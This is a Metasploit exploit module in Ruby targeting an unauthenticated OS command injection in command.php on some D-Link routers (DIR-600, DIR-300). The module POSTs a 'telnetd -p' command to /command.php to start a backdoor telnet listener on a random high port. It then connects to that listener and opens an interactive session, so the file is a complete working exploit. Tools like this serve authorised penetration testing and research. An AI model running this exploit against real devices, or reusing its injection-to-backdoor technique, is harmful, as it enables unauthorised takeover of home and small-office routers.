modules/exploits/linux/http/dlink_command_php_exec_noauth.rb
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
class MetasploitModule < Msf::Exploit::Remote
Rank = ExcellentRanking
include Msf::Exploit::Remote::HttpClient
def initialize(info = {})
super(update_info(info,
'Name' => 'D-Link Devices Unauthenticated Remote Command Execution',
'Description' => %q{
Various D-Link Routers are vulnerable to OS command injection via the web
interface. The vulnerability exists in command.php, which is accessible without
authentication. This module has been tested with the versions DIR-600 2.14b01,
DIR-300 rev B 2.13.
},
'Author' =>
[
'Michael Messner <devnull[at]s3cur1ty.de>', # Vulnerability discovery and Metasploit module
'juan vazquez' # minor help with msf module
],
'License' => MSF_LICENSE,
'References' =>
[
[ 'OSVDB', '89861' ],
[ 'EDB', '24453' ],
[ 'BID', '57734' ],
[ 'URL', 'http://www.dlink.com/uk/en/home-solutions/connect/routers/dir-600-wireless-n-150-home-router' ],
[ 'URL', 'http://www.s3cur1ty.de/home-network-horror-days' ],
[ 'URL', 'http://www.s3cur1ty.de/m1adv2013-003' ]
],
'DisclosureDate' => '2013-02-04',
'Privileged' => true,
'Platform' => 'unix',
'Arch' => ARCH_CMD,
'Payload' =>
{
'Compat' => {
'PayloadType' => 'cmd_interact',
'ConnectionType' => 'find',
},
},
'DefaultOptions' => { 'PAYLOAD' => 'cmd/unix/interact' },
'Targets' =>
[
[ 'Automatic', { } ]
],
'DefaultTarget' => 0
))
register_advanced_options(
[
OptInt.new('TelnetTimeout', [ true, 'The number of seconds to wait for a reply from a Telnet command', 10]),
OptInt.new('TelnetBannerTimeout', [ true, 'The number of seconds to wait for the initial banner', 25]),
OptInt.new('SessionTimeout', [ true, 'The number of seconds to wait before building the session on the telnet connection', 10])
])
end
def tel_timeout
(datastore['TelnetTimeout'] || 10).to_i
end
def banner_timeout
(datastore['TelnetBannerTimeout'] || 25).to_i
end
def session_timeout
(datastore['SessionTimeout'] || 10).to_i
end
def exploit
telnetport = rand(32767) + 32768
print_status("#{rhost}:#{rport} - Telnet port used: #{telnetport}")
cmd = "telnetd -p #{telnetport}"
#starting the telnetd gives no response
print_status("#{rhost}:#{rport} - Sending exploit request...")
request(cmd)
print_status("#{rhost}:#{rport} - Trying to establish a telnet connection...")
ctx = { 'Msf' => framework, 'MsfExploit' => self }
sock = Rex::Socket.create_tcp({ 'PeerHost' => rhost, 'PeerPort' => telnetport.to_i, 'Context' => ctx })
if sock.nil?
fail_with(Failure::Unreachable, "#{rhost}:#{rport} - Backdoor service has not been spawned!!!")
end
add_socket(sock)
print_status("#{rhost}:#{rport} - Trying to establish a telnet session...")
prompt = negotiate_telnet(sock)
if prompt.nil?
sock.close
fail_with(Failure::Unknown, "#{rhost}:#{rport} - Unable to establish a telnet session")
else
print_good("#{rhost}:#{rport} - Telnet session successfully established... trying to connect")
end
print_status("#{rhost}:#{rport} - Trying to create the Msf session...")
begin
Timeout.timeout(session_timeout) do
activated = handler(sock)
while(activated !~ /claimed/)
activated = handler(sock)
end
end
rescue ::Timeout::Error
fail_with(Failure::Unknown, "#{rhost}:#{rport} - Unable to establish a Msf session")
end
end
def request(cmd)
uri = '/command.php'
begin
res = send_request_cgi({
'uri' => uri,
'method' => 'POST',
'vars_post' => {
"cmd" => cmd
}
})
return res
rescue ::Rex::ConnectionError
fail_with(Failure::Unreachable, "#{rhost}:#{rport} - Could not connect to the webservice")
end
end
def negotiate_telnet(sock)
begin
Timeout.timeout(banner_timeout) do
while(true)
data = sock.get_once(-1, tel_timeout)
return nil if not data or data.length == 0
if data =~ /\x23\x20$/
return true
end
end
end
rescue ::Timeout::Error
return nil
end
end
end